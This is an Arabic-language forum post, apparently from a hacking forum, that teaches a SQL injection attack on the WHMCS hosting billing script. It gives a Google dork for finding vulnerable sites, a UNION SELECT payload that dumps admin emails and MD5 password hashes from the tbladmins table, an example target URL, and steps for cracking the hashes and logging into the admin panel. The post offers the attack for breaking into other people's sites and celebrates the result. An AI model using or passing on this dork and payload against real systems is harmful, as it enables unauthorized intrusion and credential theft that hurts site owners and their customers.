السلام عليكم ورحمه الله وبركاته
كيفكم شباب ان شاء الله تمام ..
المهم ما ابي اطول عليكم . في الشرح ..
سكربت ،،
الاستضافات حق الدعم الفني الي اسمــه .::
whmcs
هكذا اسمــه [ طبعا السكربت مصاب .. والي يلحق حضه حلوو .. ] ..
نبدا بسم الله ..:
الدورك ..:
كود PHP:
inurl:"announcements.php?id="
الي مايعرف وش الدورك ..يسألني وانا بعلمه ههههههههههههههههههههه
حطه بقوقل وبس .. وبتطلع لك مواقع كثيرة ,,
نكمل ..:
الاستغلال ..
كود PHP:
' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--%20
مثال .::
لما تبحث بقوقل بتطلع مواقع مثل كذا .::
كود PHP:
http://superseeder.eu/whmcs/announcements.php?id=7
المهم ، حط الاستغلال على [ طووول بعد هذا الرابط الي فوق .. وراح يطلع لك
اليوزر والباسورد ... [ طبعأأ الباسورد مشفر تشفير MD5 ] وسهل فكها لووول .
بعد ماتطلع اليوزر والباسورد ...
هذا المسار ..
كود PHP:
http://superseeder.eu/whmcs/admin/
يعني اكتب بعد رابط الموقع ./
/whmcs/admin/
وبجيك مكان تسجيل الدخول حق الادمن [ ودخل اليوزر والباسورد ] ..
وبفتح معاك .. [ ومبروك الاختراق .] ..
يلا مع السلامــــة [ واسف على الشرح السريع والله مشغول ]. .
سي بنل .